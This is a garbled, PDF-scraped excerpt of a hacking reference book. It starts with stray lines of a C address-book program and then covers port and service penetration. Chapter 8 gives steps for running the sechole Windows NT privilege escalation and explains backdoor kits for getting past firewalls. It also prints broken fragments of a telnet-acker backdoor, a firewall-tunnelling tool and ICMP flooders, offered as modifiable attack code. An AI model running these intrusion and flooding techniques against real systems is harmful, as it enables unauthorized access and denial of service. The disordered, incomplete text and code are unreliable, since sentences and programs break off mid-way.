Hack Attacks Revealed A Complete Reference with Custom Security Hacking Toolkit phần 5 pps

To simplify the options, there are two basic architectural categories, the packet filter and proxy firewall—each has an enhanced version.. An example of this filter type is a simple rout

int activepage(void)

{

/* Returns the currently selected video display page */

union REGS inreg,outreg;

This function assumes a COLOR display card For use with a monochrome display card change 0xB800 to read 0xB000

void DBOX(int l, int t, int r, int b)

if ((key == 8) && (key_pos > 0))

/* A fatal error has occured */

printf ("\nFATAL ERROR: %s",error);

exit(0);

}

void OPENDATA()

{

/* otherwise open it for reading/writing at end of file */ handle = open(fpath,O_RDWR,S_IWRITE);

cprintf("Address %-30.30s",rec.address); cursor(10,3);

cprintf("Fax %-30.30s",rec.fax);

}

if (strstr(strupr(rec.address),text) != NULL) return(1);

if (strstr(strupr(rec.post),text) != NULL)

return(1);

if (strstr(strupr(rec.telephone),text) != NULL) return(1);

cprintf("Searching for %s Please Wait… ",stext); strupr(stext);

/* Locate start of file */

cprintf("Enter selection criteria");

/* Clear existing rec details */

cprintf("Enter selection criteria");

/* Clear existing rec details */

memset(&rec,0,recsize);

DISPDATA();

GETDATA(0);

textcolor(WHITE);

print("F8 Print address labels");

case 1 : /* Previous rec */

result = lseek(handle,0 - recsize * 2,SEEK_CUR);

/* If not at end of file, && !new rewind one rec */

if (result != end || ! new)

result = lseek(handle,0 - recsize,SEEK_CUR);

default: /* Amend current rec */

/* If not at end of file, && !new rewind one rec */

if (result != end || ! new)

result = lseek(handle,0 - recsize,SEEK_CUR);

Conclusion

At this point, we discussed technical positions as they pertain to communication protocols and mediums We also learned critical hacker discovery and scanning techniques used when planning attacks Moving on, we studied pertinent internetworking knowledge that formulates a hacker’s technology foundation From there we concluded with a comprehensive introductio n to the C programmer’s language

It’s now time to consider all we’ve learned while we explore the different vulnerability penetrations used by hackers to control computers, servers, and internetworking equipment

CHAPTER

8

Port, Socket, and Service Vulnerability Penetrations

This chapter addresses the different vulnerability penetrations used to substantiate and take

advantage of breaches uncovered during the discovery and site scan phases of a security analysis,

described in Chapter 5 Hackers typically use these methods to gain administrative access and to break through to, then control computers, servers, and internetworking equipment

To help you better understand the impact of such an attack on an inadequate security policy, we’ll survey real- world penetration cases throughout this chapter

To fully understand the material in this and the rest of the chapters in this book (and

to become the hacker guru), you must have a solid background in programming, specifically how programs function internally To that end, be sure you thoroughly understand the material in Chapter 7, ‘‘Hacker Coding Fundamentals.” You may also want or need to review other programming publications offered at the publisher’s Web site, www.wiley.com

Example Case Synopsis

To begin, we’ll investigate a common example of a penetration attack on a Microsoft Windows NT network By exploiting existing Windows NT services, an application can locate a specific application programming interface (API) call in open process memory, modify the instructions in a running instance, and gain debug- level access to the system At that point, the attacker now connected, will have full membership rights in the Administrators group of the local NT Security Accounts Manager (SAM) database (as you may know, SAM plays a crucial role in Windows NT account authentication and security)

Let’s take a closer look at this infiltration The following describes how any normal, or nonadministrative user, on a Windows NT network, can instantly gain administrative control by running a simple hacker program The only requirements are to have a machine running Windows

NT 3.51, 4.0, or 5.0 (Workstation or Server) and then to follow four simple steps:

1 Log in Log in as any user on the machine, including the Guest account

2 Copy files After logging in, copy the files sechole.exe and admindll.dll onto a hard disk drive

in any directory in which you have write and execute access

3 Run Sechole.exe Execute sechole.exe (It is important to note that after running this program,

your system might become unstable or possibly even lock up.)

4 If necessary, reboot the machine Presto! The current nonadmin user belongs to the Windows

NT Administrators group, meaning that he or she has complete administrative control over that machine

The programs shown in this chapter are available on the CD bundled with this book

Indeed, if this infiltration were to take place on an unprotected network server, this example could be

an IT staff nightmare, especially when used with a log basher (described later in this chapter) to help

conceal any trace of the attack This particular type of penetration is commonly undertaken from within an organization or through remote access via extranets and virtual private networks (VPNs)

At this point, let’s move forward to discuss other secret methods and techniques used to exploit potential security holes, both local and remote

Backdoor Kits

In essence, a backdoor is a means and method used by hackers to gain, retain, and cover their access

to an internetworking architecture (i.e., a system)

More generally, a backdoor refers to a flaw in a particular security system Therefore, hackers often want to preserve access to systems that they have penetrated even in the face of obstacles such as new firewalls, filters, proxies, and patched vulnerabilities

Backdoor kits branch into two distinct categories: active and passive Active backdoors can be used

by a hacker anytime he or she wishes; passive backdoor kits trigger themselves according to a predetermined time or system event The type of backdoor a hacker selects is directly related to the security gateway architecture in place Network security is commonly confined to the aforementioned impediments—firewalls, filters, and proxies To simplify the options, there are two basic architectural categories, the packet filter and proxy firewall—each has an enhanced version

Packet Filter

The packet filter is a host or router that checks each packet against a policy or rule before routing it

to the destined network and/or node through the correct interface Most common filter policies reject ICMP, UDP, and incoming SYN/ACK packets that initiate an inward session Very simple types of these filters can filter only from the source host, destination host, and destination port Advanced types can also base decisions on an incoming interface, source port, and even header flags An example of this filter type is a simple router such as any Cisco series access router or even a UNIX station with a firewall daemon If the router is configured to pass a particular protocol, external hosts can use that protocol to establish a direct connection to internal hosts Most routers can be programmed to produce an audit log with features to generate alarms when hostile behavior is detected

A problem with packet filters is that they are hard to manage; as rules become more complex, it’s concomitantly easier to generate conflicting policies or to allow in unwanted packets Hackers realize that these architectures are also known to have numerous security gaps Regardless, packet filters do have their place, primarily as a first line of defense before a firewall Currently, many firewalls have

packet filters compiled with their kernel module or internetworking operating system (IOS)

Stateful Filter

A stateful filter is an enhanced version of a packet filter, providing the same functionality as their

predecessors while also keeping track of state information (such as TCP sequence numbers) Fundamentally, a stateful filter maintains information about connections Examples include the Cisco PIX, Checkpoint FireWall-1, and Watchguard firewall

The stateful process is defined as the analysis of data within the lowest levels of the protocol stack to compare the current session to previous ones, for the purpose of detecting suspicious activity Unlike

does not rely on predefined application information Stateful inspection also takes less processing power than application level analysis On the downside, stateful inspection firewalls do not recognize specific applications, hence are unable to apply dissimilar rules to different applications

Proxy Firewall

A proxy firewall host is simply a server with dual network interface cards (NICs) that has routing or

packet forwarding deactivated, utilizing a proxy server daemon instead For every application that requires passage through this gateway, software must be installed and running to proxy it through A proxy server acts on behalf of one or more other servers; usually for screening, firewalling, caching,

or a combination of these purposes

The term gateway is often used as a synonym for proxy server Typically, a proxy server is used

within a company or enterprise to gather all Internet requests, forward them to Internet servers, receive the responses, and in turn, forward them to the original requestor within the company (using

a proxy agent , which acts on behalf of a user, typically accepting a connection from a user and

completing a connection with a remote host or service)

Application Proxy Gateway

An application proxy gateway is the enhanced version of a proxy firewall, and like the proxy

firewall, for every application that should pass through the firewall, software must be installed and running to proxy it The difference is that the application gateway contains integrated modules that check every request and response For example, an outgoing file transfer protocol (FTP) stream may only download data Application gateways look at data at the application layer of the protocol stack and serve as proxies for outside users, intercepting packets and forwarding them to the application Thus, outside users never have a direct connection to anything beyond the firewall The fact that the firewall looks at this application information means that it can distinguish among such things as FTP and SMTP For that reason, the application gateway provides security for each application it supports

Most vendor security architectures contain their own unique security breaches (see Chapter 9 for more information)

Implementing a Backdoor Kit

Exploiting security breaches with backdoors, through firewall architectures, is not a simple task Rather, it must be carefully planned to reach a successful completion When implementing a backdoor kit, frequently, four actions take place:

• Seizing a virtual connection This involves hijacking a remote telnet session, a VPN tunnel,

or a secure-ID session

• Planting an insider This is a user, technician, or socially engineered (swindled) individual

who installs the kit from the internal network A much simpler and common version of this action involves spoofing email to an internal user with a remote-access Trojan attached

• Manipulating an internal vulnerability Most networks offer some suite of services, whether

it be email, domain name resolution, or Web server access in a demilitarized zone (DMZ; the zone in front of the firewall, often not completely protected by a firewall) An attack can be made on any one of those services with a good chance of gaining access Consider the fact that many firewalls run daemons for mail relay

• Manipulating an external vulnerability This involves penetrating through an external mail

server, HTTP server daemon, and/or telnet service on an external boundary gateway Most

security policies are considered standard or incomplete (susceptible), thus making it possible

to cause a buffer overflow or port flooding, at the very least

Because these machines are generally monitored and checked regularly, a seasoned hacker will not attempt to put a backdoor on a machine directly connected to the firewall segment Common targets are the internal local area network (LAN) nodes, which are usually unprotected and without regular administration

Statistics indicate that 7 out of 10 nodes with access to the Internet, in front of or behind a firewall, have been exposed to some form of Trojan or backdoor kit Hackers often randomly scan the Internet for these ports in search for a new victim Common Backdoor Methods in Use

This section describes common backdoor methods used in the basic architecture categories and their enhanced versions defined in the preceding sections

Packet Filters

Routers and gateways acting as packet filters usually have one thing in common: the capability to telnet to and/or from this gateway for administration A flavor of this so-called telnet-acker backdoor methodology is commonly applied to surpass these filters This method is similar to a standard telnet daemon except it does not formulate the TCP handshake by using TCP ACK packets only Because these packets look as though they belong to a previously established connection, they are permitted

to pass through The following is an example that can be modified for this type of backdoor routine: telnet-acker.c

/*"Telnet to address/port Hit 1x [ENTER], password,"*/

/*"Host and port 23 for connection."*/

char sbuf[2048], cbuf[2048];

extern int errno;

extern char *sys_errlist[];

void reaper();

int srv_fd, rem_fd, rem_len, opt = 1;

struct sockaddr_in rem_addr, srv_addr;

bzero((char *) &rem_addr, sizeof(rem_addr));

bzero((char *) &srv_addr, sizeof(srv_addr));

if ((rem_fd = open("/dev/tty", O_RDWR)) >= 0) {

ioctl(rem_fd, TIOCNOTTY, (char *)0);

sprintf(string, "telnet bouncer ready.\n");

write(source, string, strlen(string));

#if !defined(h_addr) /* In 4.3, this is a #define */

#if defined(hpux) || defined(NeXT) || defined(ultrix) || defined(POSIX)

sprintf(string, "Found address for %s\n", hp->h_name); write(source, string, strlen(string));

sprintf(string, "%s: bad port number\n", getport);

write(source, string, strlen(string));

write(source, string, strlen(string));

if ((dest = socket(AF_INET, SOCK_STREAM, 0)) < 0) {

perror("telcli: socket");

exit(1);

}

connect(dest, (struct sockaddr *) &sa, sizeof(sa));

sprintf(string, "Connected to %s port %d… \n",

communicate(sfd,cfd) {

char *chead, *ctail, *shead, *stail;

int num, nfd, spos, cpos;

extern int errno;

if (spos < sizeof(sbuf)-1) FD_SET(sfd, &rd);

if (ctail > chead) FD_SET(sfd, &wr);

if (cpos < sizeof(cbuf)-1) FD_SET(cfd, &rd);

if (stail > shead) FD_SET(cfd, &wr);

nfd = select(256, &rd, &wr, 0, 0);

if ((num==-1) && (errno != EWOULDBLOCK)) return;

printf("Waiting for TCP connection… \n");

if((netfd = accept(sock, &listenaddr, &socklen)) == -1) { perror("accept");

printf("%d bytes from interface\n", len);

write(netfd, buffer, len);

/* fwtunnel uses ethertrap to tunnel an addrress

fwtunnel <host | -> <port>

the first argument is either the hostname to connect to, or, if you're the host which will be listening, a - obviously, the system inside the firewall gives the hostname, and the free syste

first, you'll need a kernel in the later 2.1 range

in the "Networking Options" section, turn on:

"Kernel/User netlink socket"

and, just below,

also, in the "Network device support" section, turn on:

"Ethertap network tap"

if those are compiled in, your kernel is set */

/* configuring the ethertap device

first, the necessary /dev files need to exist, so run:

mknod /dev/tap0 c 36 16

to get that to exist

next, you have to ifconfig the ethertap device, so pick a subnet you're going to use for that in this example, we're going to us

e

the network 192.168.1.0, with one side as 192.168.1.1, and the other as 192.168.1.2… so, you'll need to do:

ifconfig tap0 192.168.1.1(or 2) mtu 1200

2.1 kernels should create the needed route automatically, so that shouldn't be a problem

*/

Another popular and simple means for bypassing stateful filters is invisible FTP (file winftp.exe)

This daemon does not show anything when it runs, as it executes the FTP service listening on port

21, which can be connected to with any FTP client The program is usually attached to spammed email and disguised as a joke Upon execution, complete uploading and downloading control is active to any anonymous hacker

Proxies and Application Gateways

Most companies with security policies allow internal users to browse Web pages A rule of thumb from the Underground is to defeat a firewall by attacking the weakest proxy or port number Hackers use a reverse HTTP shell to exploit this standard policy, allowing access back into the internal network through this connection stream An example of this attack method in Perl is

of ongoing concern

Flooding

On a system whose network interface binds the TCP/IP protocol and/or connected to the Internet via dialup or direct connection, some or all network services can be rendered unavailable when an error message such as the following appears:

‘‘Connection has been lost or reset.”

This type of error message is frequently a symptom of a malicious penetration attack known as

flooding The previous example pertains to a SYN attack, whereby hackers can target an entire

machine or a specific TCP service such as HTTP (port 80) Web service The attack is focused on the TCP protocol used by all computers on the Internet; and though it is not specific to the Windows NT operating system, we will use this OS for the purposes of this discussion

Recall the SYN-ACK (three-way) handshake described in Chapter 1: Basically, a TCP connection request (SYN) is sent to a target or destination computer for a communication request The source IP address in the packet is “spoofed,” or replaced with an address that is not in use on the Internet (it belongs to another computer) An attacker sends numerous TCP SYNs to tie up as many resources as possible on the target computer Upon receiving the connection request, the target computer allocates resources to handle and track this new communication session, then responds with a “SYN-ACK.” In

Figure 8.1 Revealing active connections with netstat

this case, the response is sent to the spoofed or nonexistent IP address As a result, no response is received to the SYN-ACK; therefore, a default-configured Windows NT 3.5x or 4.0 computer, will retransmit the SYN-ACK five times, doubling the time-out value after each retransmission The initial time-out value is three seconds, so retries are attempted at 3, 6, 12, 24, and 48 seconds After the last retransmission, 96 seconds are allowed to pass before the computer gives up waiting to receive a response and thus reallocates the resources that were set aside earlier The total elapsed time that resources would be unavailable equates to approximately 189 seconds

If you suspect that your computer is the target of a SYN attack, you can type the netstat command shown in Figure 8.1 at a command prompt to view active connections

If a large number of connections are currently in the SYN_RECEIVED state, the system may be under attack, shown in boldface in Figure 8.2

A sniffer (described later) can be used to further troubleshoot the problem, and it may be necessary

to contact the next tier ISP for assistance in tracking the attacker For most stacks, there is a limit on the number of connections that may be in the SYN_RECEIVED state; and once reached for a given port,

Figure 8.2 Revealing active connections in the SYN-REC state

the target system responds with a reset This can render the system as infinitely occupied

System configurations and security policies must be specifically modified for protection against such attacks Statistics indicate that some 90 percent of nodes connected to the Internet are susceptible An

example of such a flooding mechanism is shown in echos.c (an echo flooder) shown here:

struct ip *ip = (struct ip *)buf;

struct icmp *icmp = (struct icmp *)(ip + 1);

struct hostent *hp;

struct sockaddr_in dst;

int offset;

int on = 1;

bzero(buf, sizeof buf);

if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {

perror("socket");

exit(1);

}

fprintf(stderr, "%s: unknown host\n", argv[1]);

ip->ip_sum = 0; /* kernel fills in */

ip->ip_src.s_addr = 0; /* kernel fills in */

/* the checksum of all 0's is easy to compute */

for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {

ip->ip_len = FIX(418); /* make total 65538 */

if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,

sizeof dst) < 0) {

fprintf(stderr, "offset %d: ", offset); perror("sendto");

Figure 8.3 Ping flooding

A compiled version of this type of daemon to test flooding vulnerabilities is included as a TigerSuite module found on the CD bundled with this book An illustration of this assembled version is shown

in Figure 8.3

A popular modifiable hacker saturation flooder, comparable to the technique just described, is shown

here as a spoofed ICMP broadcast flooder called flood.c

#define IPHDRSIZE sizeof(struct iphdr)

#define ICMPHDRSIZE sizeof(struct icmphdr)